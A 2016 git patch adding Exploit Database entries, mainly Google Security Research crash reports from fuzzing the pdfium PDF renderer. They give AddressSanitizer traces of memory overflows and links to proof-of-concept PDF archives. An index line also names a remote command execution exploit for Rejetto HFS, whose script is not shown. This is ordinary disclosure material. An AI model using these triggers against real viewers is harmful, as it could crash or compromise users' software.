From 19f864b3ca9282782d1bb584a22793e09b814180 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 5 Jan 2016 05:03:47 +0000 Subject: [PATCH] DB: 2016-01-05 5 new exploits --- files.csv | 5 ++ platforms/multiple/dos/39162.txt | 96 +++++++++++++++++++++++++++++++ platforms/multiple/dos/39163.txt | 84 +++++++++++++++++++++++++++ platforms/multiple/dos/39164.txt | 59 +++++++++++++++++++ platforms/multiple/dos/39165.txt | 84 +++++++++++++++++++++++++++ platforms/windows/remote/39161.py | 47 +++++++++++++++ 6 files changed, 375 insertions(+) create mode 100755 platforms/multiple/dos/39162.txt create mode 100755 platforms/multiple/dos/39163.txt create mode 100755 platforms/multiple/dos/39164.txt create mode 100755 platforms/multiple/dos/39165.txt create mode 100755 platforms/windows/remote/39161.py
diff --git a/files.csv b/files.csv
index 2f33cc2fc..13b8f2808 100755
--- a/files.csv
+++ b/files.csv
@@ -35406,3 +35406,8 @@ id,file,description,date,author,platform,type,port
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
+39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
+39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
+39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
+39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0
+39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
diff --git a/platforms/multiple/dos/39162.txt b/platforms/multiple/dos/39162.txt
new file mode 100755
index 000000000..08bce4088
--- /dev/null
+++ b/platforms/multiple/dos/39162.txt
@@ -0,0 +1,96 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=625
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+$ ./pdfium_test asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6
+Rendering PDF file asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6.
+Non-linearized path...
+=================================================================
+==28672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800000f7b2 at pc 0x000000ed2cac bp 0x7ffea0af5970 sp 0x7ffea0af5968
+READ of size 1 at 0x61800000f7b2 thread T0
+ #0 0xed2cab in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64
+ #1 0xece99e in CPDF_DIBSource::DownSampleScanline(int, unsigned char*, int, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1277:5
+ #2 0x115235c in CFX_ImageStretcher::ContinueQuickStretch(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:910:5
+ #3 0x1151805 in CFX_ImageStretcher::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:834:12
+ #4 0x11831f8 in CFX_ImageTransformer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_transform.cpp:409:7
+ #5 0x117a4a1 in CFX_ImageRenderer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_main.cpp:1637:9
+ #6 0x10986a2 in CFX_AggDeviceDriver::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/agg/src/fx_agg_driver.cpp:1748:10
+ #7 0x11a32f1 in CFX_RenderDevice::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/ge/fx_ge_device.cpp:471:10
+ #8 0xe8f1f1 in CPDF_ImageRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:869:12
+ #9 0xe673bf in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:299:9
+ #10 0xe67eff in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:328:12
+ #11 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+ #12 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+ #13 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+ #14 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+ #15 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+ #16 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+ #17 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+0x61800000f7b2 is located 0 bytes to the right of 818-byte region [0x61800000f480,0x61800000f7b2)
+allocated by thread T0 here:
+ #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
+ #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
+ #2 0xe1c1d6 in CPDF_SyntaxParser::ReadStream(CPDF_Dictionary*, PARSE_CONTEXT*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2444:13
+ #3 0xe06543 in CPDF_SyntaxParser::GetObject(CPDF_IndirectObjects*, unsigned int, unsigned int, PARSE_CONTEXT*, int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2171:12
+ #4 0xe071a4 in CPDF_Parser::ParseIndirectObjectAt(CPDF_IndirectObjects*, long, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1400:7
+ #5 0xe0897f in CPDF_Parser::ParseIndirectObject(CPDF_IndirectObjects*, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1195:12
+ #6 0xdd7c93 in CPDF_IndirectObjects::GetIndirectObject(unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:1125:12
+ #7 0xddafdf in CPDF_Object::GetDirect() const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:220:10
+ #8 0xde4960 in CPDF_Dictionary::GetElementValue(CFX_ByteStringC const&) const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:594:14
+ #9 0xd99b9b in CPDF_StreamContentParser::FindResourceObj(CFX_ByteStringC const&, CFX_ByteString const&) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1178:25
+ #10 0xd8d60c in CPDF_StreamContentParser::Handle_ExecuteXObject() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:696:36
+ #11 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
+ #12 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
+ #13 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
+ #14 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
+ #15 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
+ #16 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
+ #17 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
+ #18 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+ #19 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const
+Shadow bytes around the buggy address:
+ 0x0c307fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c307fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c307fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c307fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c307fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c307fff9ef0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa
+ 0x0c307fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c307fff9f10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+ 0x0c307fff9f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+ 0x0c307fff9f30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+ 0x0c307fff9f40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==28672==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554151. Attached are two PDF files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39162.zip
+
diff --git a/platforms/multiple/dos/39163.txt b/platforms/multiple/dos/39163.txt
new file mode 100755
index 000000000..073a95473
--- /dev/null
+++ b/platforms/multiple/dos/39163.txt
@@ -0,0 +1,84 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=623
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+$ ./pdfium_test asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74
+Rendering PDF file asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74.
+Non-linearized path...
+=================================================================
+==27153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000794c at pc 0x000000cfaaef bp 0x7ffd89a11070 sp 0x7ffd89a11068
+READ of size 4 at 0x60700000794c thread T0
+ #0 0xcfaaee in CPDF_TextObject::CalcPositionData(float*, float*, float, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17
+ #1 0xda18a4 in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1301:3
+ #2 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
+ #3 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
+ #4 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
+ #5 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
+ #6 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
+ #7 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
+ #8 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
+ #9 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
+ #10 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+ #11 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+0x60700000794c is located 4 bytes to the left of 72-byte region [0x607000007950,0x607000007998)
+allocated by thread T0 here:
+ #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
+ #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
+ #2 0xcf6db6 in CPDF_TextObject::SetSegments(CFX_ByteString const*, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:233:18
+ #3 0xda150f in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1296:3
+ #4 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
+ #5 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
+ #6 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
+ #7 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
+ #8 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
+ #9 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
+ #10 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
+ #11 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
+ #12 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+ #13 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17 in CPDF_TextObject::CalcPositionData(float*, float*, float, int)
+Shadow bytes around the buggy address:
+ 0x0c0e7fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa[fa]00 00 00 00 00 00
+ 0x0c0e7fff8f30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
+ 0x0c0e7fff8f40: 00 04 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
+ 0x0c0e7fff8f50: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
+ 0x0c0e7fff8f60: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
+ 0x0c0e7fff8f70: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==27153==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554115. Attached is the PDF file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39163.zip
+
diff --git a/platforms/multiple/dos/39164.txt b/platforms/multiple/dos/39164.txt
new file mode 100755
index 000000000..06c58f596
--- /dev/null
+++ b/platforms/multiple/dos/39164.txt
@@ -0,0 +1,59 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=622
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+==31710==ERROR: AddressSanitizer: SEGV on unknown address 0x7f53cc100009 (pc 0x0000016fafe2 bp 0x7ffee170d730 sp 0x7ffee170d6b0 T0)
+ #0 0x16fafe1 in IsFlagSet v8/src/heap/spaces.h:548:13
+ #1 0x16fafe1 in IsEvacuationCandidate v8/src/heap/spaces.h:689
+ #2 0x16fafe1 in RecordSlot v8/src/heap/mark-compact-inl.h:62
+ #3 0x16fafe1 in VisitPointers v8/src/heap/incremental-marking.cc:320
+ #4 0x16fafe1 in v8::internal::StaticMarkingVisitor::VisitPropertyCell(v8::internal::Map*, v8::internal::HeapObject*) v8/src/heap/objects-visiting-inl.h:341
+ #5 0x16ed00a in IterateBody v8/src/heap/objects-visiting.h:355:5
+ #6 0x16ed00a in VisitObject v8/src/heap/incremental-marking.cc:732
+ #7 0x16ed00a in ProcessMarkingDeque v8/src/heap/incremental-marking.cc:769
+ #8 0x16ed00a in v8::internal::IncrementalMarking::Step(long, v8::internal::IncrementalMarking::CompletionAction, v8::internal::IncrementalMarking::ForceMarkingAction, v8::internal::IncrementalMarking::ForceCompletionAction) v8/src/heap/incremental-marking.cc:1098
+ #9 0x1836243 in InlineAllocationStep v8/src/heap/spaces.h:2537:7
+ #10 0x1836243 in InlineAllocationStep v8/src/heap/spaces.cc:1636
+ #11 0x1836243 in v8::internal::NewSpace::EnsureAllocation(int, v8::internal::AllocationAlignment) v8/src/heap/spaces.cc:1597
+ #12 0x16028a2 in AllocateRawUnaligned v8/src/heap/spaces-inl.h:456:10
+ #13 0x16028a2 in AllocateRaw v8/src/heap/spaces-inl.h:480
+ #14 0x16028a2 in v8::internal::Heap::AllocateRaw(int, v8::internal::AllocationSpace, v8::internal::AllocationAlignment) v8/src/heap/heap-inl.h:215
+ #15 0x16960d7 in v8::internal::Heap::AllocateFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/heap/heap.cc:2119:35
+ #16 0x159a4a2 in v8::internal::Factory::NewFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/factory.cc:79:3
+ #17 0x25834ee in __RT_impl_Runtime_AllocateInTargetSpace v8/src/runtime/runtime-internal.cc:246:11
+ #18 0x25834ee in v8::internal::Runtime_AllocateInTargetSpace(int, v8::internal::Object**, v8::internal::Isolate*) v8/src/runtime/runtime-internal.cc:236
+ #7 0x7f53d03063d7 ()
+ #8 0x7f53d040f273 ()
+ #9 0x7f53d040ad4d ()
+ #10 0x7f53d0336da3 ()
+ #11 0x7f53d031a8e1 ()
+ #19 0x158a09f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle, v8::internal::Handle, int, v8::internal::Handle*, v8::internal::Handle) v8/src/execution.cc:98:13
+ #20 0x158882d in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle, v8::internal::Handle, int, v8::internal::Handle*) v8/src/execution.cc:167:10
+ #21 0xf6e33e in v8::Script::Run(v8::Local) v8/src/api.cc:1743:23
+ #22 0xebf5cb in FXJS_Execute(v8::Isolate*, IJS_Context*, wchar_t const*, FXJSErr*) third_party/pdfium/fpdfsdk/src/jsapi/fxjs_v8.cpp:384:8
+ #23 0xe3cc12 in CJS_Runtime::Execute(IJS_Context*, wchar_t const*, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Runtime.cpp:188:14
+ #24 0xf54991 in CJS_Context::RunScript(CFX_WideString const&, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Context.cpp:59:12
+ #25 0x553134 in CPDFSDK_InterForm::OnFormat(CPDF_FormField*, int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:1822:24
+ #26 0x552b8c in CPDFSDK_Widget::OnFormat(int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:330:10
+ #27 0x584be9 in CPDFSDK_BFAnnotHandler::OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:593:31
+ #28 0x57e44a in CPDFSDK_AnnotHandlerMgr::Annot_OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:94:5
+ #29 0x574f67 in CPDFSDK_PageView::LoadFXAnnots() third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:886:5
+ #30 0x573c36 in CPDFSDK_Document::GetPageView(CPDF_Page*, int) third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:420:3
+ #31 0x528ec3 in FormHandleToPageView third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:32:20
+ #32 0x528ec3 in FORM_OnAfterLoadPage third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:263
+ #33 0x4da9c2 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:346:3
+ #34 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
+ #35 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
+ #36 0x7f553e1c4ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV (pdfium_test+0x16fafe1)
+==31710==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554099. Attached is the PDF file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39164.zip
+
diff --git a/platforms/multiple/dos/39165.txt b/platforms/multiple/dos/39165.txt
new file mode 100755
index 000000000..f0d1035c5
--- /dev/null
+++ b/platforms/multiple/dos/39165.txt
@@ -0,0 +1,84 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=612
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+$ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8
+Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8.
+Non-linearized path...
+=================================================================
+==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8
+READ of size 4 at 0x7ffc8b7edb84 thread T0
+ #0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9
+ #1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3
+ #2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3
+ #3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15
+ #4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7
+ #5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3
+ #6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14
+ #7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3
+ #8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5
+ #9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3
+ #10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14
+ #11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3
+ #12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+ #13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+ #14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+ #15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+ #16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+ #17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+ #18 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
+ #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
+
+ This frame has 2 object(s):
+ [32, 36) 'input' <== Memory access at offset 36 overflows this variable
+ [48, 52) 'nresults'
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+ (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
+Shadow bytes around the buggy address:
+ 0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
+=>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==22207==ABORTING
+--- cut ---
+
